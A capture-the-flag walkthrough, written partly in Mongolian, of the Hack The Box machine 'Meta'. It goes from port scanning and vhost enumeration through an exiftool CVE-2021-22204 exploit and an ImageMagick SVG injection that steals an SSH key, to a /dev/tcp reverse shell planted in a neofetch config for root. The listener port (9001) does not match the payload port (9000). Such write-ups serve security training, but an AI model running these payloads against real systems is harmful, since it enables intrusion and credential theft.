1. IP Address

# Machine Address
10.10.11.140

# Local Address
10.10.14.90

2. Nmap

nmap -sC -sV -oA nmap/meta 10.10.11.140

Result:

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-30 04:32 EST
Nmap scan report for 10.10.11.140
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.09 seconds

/etc/hosts-д artcorp.htb нэмж оруулна.

3. Gobuster

gobuster dir -u http://artcorp.htb -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt 

Result:

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://artcorp.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/30 04:38:58 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 234] [--> http://artcorp.htb/assets/]
/css                  (Status: 301) [Size: 231] [--> http://artcorp.htb/css/] 

V-host:

gobuster vhost -u http://artcorp.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://artcorp.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/01/30 04:45:39 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]

dev01.artcorp.htb -г etc/hosts дотор нэмлээ.

4. CVE-2021-22204

http://dev01.artcorp.htb/metaview/

зураг upload хийвэл:

File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 275
Image Height                    : 183
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)

exiftool - cve ашиглаж exploit хийж www руу хандах:

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool

дотор байгаа exploit.py ip, port өөрийн хаягаар сольж бичээд python3 exploit.py ажилуулаад шинээр generate хийсэн image.jpg-г upload хийнэ. Өмнө нь nc -lvnp 9001 порт асаагаад listen хийнэ.

Shell balancing

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty raw -echo

f+g [enter enter] буцаад nc орох үед:

export TERM=xterm

/etc/passwd:

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
bash-5.0$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

thomas нэртэй user байгаад харж болж байна.

5. Exploitation

pspy64s:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

Web server асаах:

mkdir www
mv pspy64s www
python3 -m http.server

www:

cd /tmp
wget 10.10.14.90:8000/pspy64s
chmod +x pspy64s
./pspy64s

/usr/local/bin/convert_images.sh

2022/01/30 07:37:01 CMD: UID=1000 PID=26258  | /bin/bash /usr/local/bin/convert_images.sh 
2022/01/30 07:37:01 CMD: UID=1000 PID=26259  | /usr/local/bin/mogrify -format png *.* 
2022/01/30 07:37:01 CMD: UID=1000 PID=26260  | pkill mogrify 

/use/local/bin/convet_images.sh:

#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

poc.svg: /tmp дотор touch хийгээд save хийнэ.

<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/key`;"'>  
 <read filename="pdf:/etc/passwd"/>  
 <get width="base-width" height="base-height" />  
 <resize geometry="400x400" />  
 <write filename="test.png" />  
 <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">  
 <image xlink:href="msl:poc.svg" height="100" width="100"/>  
 </svg>  
</image>

доор байгаа path руу хуулаад cron ажиллах хүртэл хүлээнэ.

cp /tmp/poc.svg /var/www/dev01.artcorp.htb/convert_images/

/dev/shm дотор key нэртэй id_rsa үүссэн байгаа. wget юм уу cat хийж байгаад id_rsa хуулаад форматад оруулаад

mv key id_rsa
chmod 600 id_rsa
ssh -i id_rsa thomas@10.10.11.140

user.txt:

1675c9*******

6. Enumeration

sudo -l

thomas-с хэрэглэж болох зүйл:

Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

/usr/bin/neofetch:

       _,met$$$$$gg.          root@meta 
    ,g$$$$$$$$$$$$$$$P.       --------- 
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64 
 ,$$P'              `$$$.     Host: VMware Virtual Platform None 
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64 
`d$$'     ,$P"'   .    $$$    Uptime: 4 hours, 41 mins 
 $$P      d$'     ,    $$P    Packages: 495 (dpkg) 
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3 
 $$;      Y$b._   _,d$P'      CPU: AMD EPYC 7302P 16- (2) @ 2.994GHz 
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter 
 `$$b      "-.__              Memory: 151MiB / 1994MiB 
  `Y$$
   `Y$$.                                              
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

/home/thomas/.config/neofetch:

vi config.conf
# add
bash &>/dev/tcp/10.10.14.90/9000 <&1
# 9001 порт сонсоно
nc -lvnp 9001
# machine vm
export XDG_CONFIG_HOME=/home/thomas/.config

root.txt:

f44aa****